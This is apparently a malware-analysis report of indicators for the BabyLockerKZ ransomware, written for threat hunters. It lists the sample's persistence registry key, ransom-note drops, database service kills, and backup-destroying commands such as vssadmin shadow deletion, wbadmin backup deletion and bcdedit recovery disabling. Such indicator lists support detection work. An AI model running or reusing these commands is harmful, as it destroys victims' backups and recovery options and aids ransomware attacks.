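Technical Information
(Angle-bracket tokens such as <SYSTEM32>, <Full path to file> and <Drive name for removable media> are placeholders for host-specific values, not literal strings to match on.)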
- [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'BabyLockerKZ' = '"<Full path to file>"'
- <Drive name for removable media>:\how_to_back_files.html
- '<SYSTEM32>\taskkill.exe' -f -im sqlbrowser.exe
- '<SYSTEM32>\net.exe' stop SQLBrowser
- '<SYSTEM32>\net.exe' stop SQLAgent$MSFW
- '<SYSTEM32>\net.exe' stop SQLAgent$ISARS
- '<SYSTEM32>\net.exe' stop MSSQL$MSFW
- '<SYSTEM32>\net.exe' stop MSSQL$ISARS
- '<SYSTEM32>\net.exe' stop MSSQLServerADHelper100
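- '<SYSTEM32>\taskkill.exe' -f -impostgres.exe (sic: no space between -im and the image name; the same spelling recurs in every variant of this command listed here, so it is likely the sample's own typo rather than a transcription error. Match the literal string when hunting)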
- '<SYSTEM32>\taskkill.exe' -f -im pg_ctl.exe
- '<SYSTEM32>\taskkill.exe' -f -im msftesql.exe
- '<SYSTEM32>\taskkill.exe' -f -im ReportingServicesService.exe
- '<SYSTEM32>\taskkill.exe' -f -im fdhost.exe
- '<SYSTEM32>\taskkill.exe' -f -im SQLAGENT.EXE
- '<SYSTEM32>\taskkill.exe' -f -im Ssms.exe
- '<SYSTEM32>\taskkill.exe' -f -im fdlauncher.exe
- '<SYSTEM32>\taskkill.exe' -f -im sqlceip.exe
- '<SYSTEM32>\taskkill.exe' -f -im MsDtsSrvr.exe
- '<SYSTEM32>\taskkill.exe' -f -im msmdsrv.exe
- '<SYSTEM32>\taskkill.exe' -f -im sqlserv.exe
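- '<SYSTEM32>\taskkill.exe' -f -im sql writer.exe (sic: the image name contains a space and is unquoted; the same spelling recurs in every variant of this command listed here, so match the literal string rather than a normalised "sqlwriter.exe")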
- '<SYSTEM32>\net.exe' stop REportServer$ISARS
- '<SYSTEM32>\net.exe' stop SQLWriter
- <SYSTEM32>\vssadmin.exe
- <SYSTEM32>\wbadmin.exe
- %HOMEPATH%\desktop\64bit_notes.htm
- %HOMEPATH%\desktop\about.htm
- %HOMEPATH%\desktop\about.html
- %HOMEPATH%\desktop\adadsi.html
- %HOMEPATH%\desktop\archer.avi
- %HOMEPATH%\desktop\delete.avi
- %HOMEPATH%\desktop\fi51.doc
- %HOMEPATH%\desktop\issi2013_template_for_posters.docx
- %HOMEPATH%\desktop\lisp_success.doc
- %HOMEPATH%\desktop\ovp25012015.doc
- %HOMEPATH%\desktop\sdszfo.docx
- %HOMEPATH%\desktop\split.avi
- %HOMEPATH%\desktop\testee.cer
- %HOMEPATH%\desktop\trivial-merge.html
- C:\users\public\desktop\how_to_back_files.html
- a:\how_to_back_files.html
- C:\how_to_back_files.html
- D:\how_to_back_files.html
- C:\kms\kms_vl_all_aio.cmd
- C:\msocache\all users\{90140000-0115-0409-1000-0000000ff1ce}-c\microsoft.vc90.crt.manifest
- C:\msocache\all users\{90140000-00ba-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-00a1-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-00a1-0409-1000-0000000ff1ce}-c\onenotemui.xml
- C:\msocache\all users\{90140000-0044-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-0044-0409-1000-0000000ff1ce}-c\infopathmui.xml
- C:\msocache\all users\{90140000-0043-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-0043-0409-1000-0000000ff1ce}-c\office32mui.xml
- C:\msocache\all users\{90140000-002c-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-002c-0409-1000-0000000ff1ce}-c\proof.es\proof.xml
- C:\msocache\all users\{90140000-002c-0409-1000-0000000ff1ce}-c\proof.fr\proof.xml
- C:\msocache\all users\{90140000-001b-0409-1000-0000000ff1ce}-c\wordmui.xml
- C:\msocache\all users\{90140000-001b-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-002c-0409-1000-0000000ff1ce}-c\proof.en\proof.xml
- C:\msocache\all users\{90140000-001a-0409-1000-0000000ff1ce}-c\outlookmui.xml
- C:\msocache\all users\{90140000-001a-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-0019-0409-1000-0000000ff1ce}-c\publishermui.xml
- C:\msocache\all users\{90140000-0019-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-0018-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-0018-0409-1000-0000000ff1ce}-c\powerpointmui.xml
- C:\msocache\all users\{90140000-0016-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-0016-0409-1000-0000000ff1ce}-c\excelmui.xml
- C:\msocache\all users\{90140000-0011-0000-1000-0000000ff1ce}-c\pkeyconfig-office.xrm-ms
- C:\msocache\all users\{90140000-0011-0000-1000-0000000ff1ce}-c\proplusww.xml
- C:\msocache\all users\{90140000-0011-0000-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-0011-0000-1000-0000000ff1ce}-c\office32ww.xml
- C:\kms\kms_vl_all_aio_debug.log
- C:\msocache\all users\{90140000-0115-0409-1000-0000000ff1ce}-c\branding.xml
- C:\msocache\all users\{90140000-0115-0409-1000-0000000ff1ce}-c\officemui.xml
- ClassName: '' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
- '<SYSTEM32>\cmd.exe' /c net stop REportServer$ISARS
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
- '<SYSTEM32>\net1.exe' stop SQLBrowser
- '<SYSTEM32>\cmd.exe' /c net stop SQLBrowser
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
- '<SYSTEM32>\net1.exe' stop SQLAgent$MSFW
- '<SYSTEM32>\net1.exe' stop REportServer$ISARS
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
- '<SYSTEM32>\net1.exe' stop SQLAgent$ISARS
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
- '<SYSTEM32>\net1.exe' stop MSSQL$MSFW
- '<SYSTEM32>\cmd.exe' /c net stop MSSQL$MSFW
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
- '<SYSTEM32>\net1.exe' stop MSSQL$ISARS
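- '<SYSTEM32>\bcdedit.exe' /set {default} recoverynabled No (sic: the documented bcdedit setting is "recoveryenabled"; the misspelling recurs in every variant of this command listed here, so detection rules keyed only on the correct spelling will miss it)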
- '<SYSTEM32>\cmd.exe' /c net stop MSSQL$ISARS
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
- '<SYSTEM32>\cmd.exe' /c net stop SQLAgent$ISARS
- '<SYSTEM32>\cmd.exe' /c net stop SQLWriter
- '<SYSTEM32>\cmd.exe' /c bcdedit.exe /set {default} recoverynabled No
- '<SYSTEM32>\net1.exe' stop SQLWriter
- '<SYSTEM32>\wbadmin.exe' DELETE SYSTEMSTATEBACKUP
- '<SYSTEM32>\wbadmin.exe' delete backup -keepVersion:0 -quiet
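- '<SYSTEM32>\wbadmin.exe' DELETE SYSTEMSTABACKUP -deleteOldest (sic: misspelling of SYSTEMSTATEBACKUP, which is spelled correctly in the entry without -deleteOldest; the misspelling recurs in every -deleteOldest variant listed here, so match both spellings when hunting)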
- '<SYSTEM32>\bcdedit.exe' /set {default} bootstatuspolicy ignoreallfailures
- '<SYSTEM32>\cmd.exe' /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
- '<SYSTEM32>\wbem\wmic.exe' SHADOWCOPY /nointeractive
- '<SYSTEM32>\cmd.exe' /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
- '<SYSTEM32>\cmd.exe' /c wbadmin delete backup -keepVersion:0 -quiet
- '<SYSTEM32>\cmd.exe' /c wbadmin DELETE SYSTEMSTATEBACKUP
- '<SYSTEM32>\cmd.exe' /c wmic.exe SHADOWCOPY /nointeractive
- '<SYSTEM32>\cmd.exe' /c vssadmin.exe Delete Shadows /All /Quiet
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
- '<SYSTEM32>\cmd.exe' /c net stop SQLAgent$MSFW
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
- '<SYSTEM32>\cmd.exe' /c net stop MSSQLServerADHelper100
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
- '<SYSTEM32>\net1.exe' stop MSSQLServerADHelper100
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
- '<SYSTEM32>\cmd.exe' /c taskkill -f -impostgres.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im sqlceip.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im MsDtsSrvr.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im Ssms.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im msmdsrv.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im sqlserv.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im sql writer.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im fdlauncher.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im sqlbrowser.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
- '<SYSTEM32>\cmd.exe' /c rem Kill "SQL"
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
- '<SYSTEM32>\cmd.exe' /c pause
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im msftesql.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im ReportingServicesService.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im pg_ctl.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im fdhost.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im SQLAGENT.EXE
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop SQLWriter' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe' (with hidden window)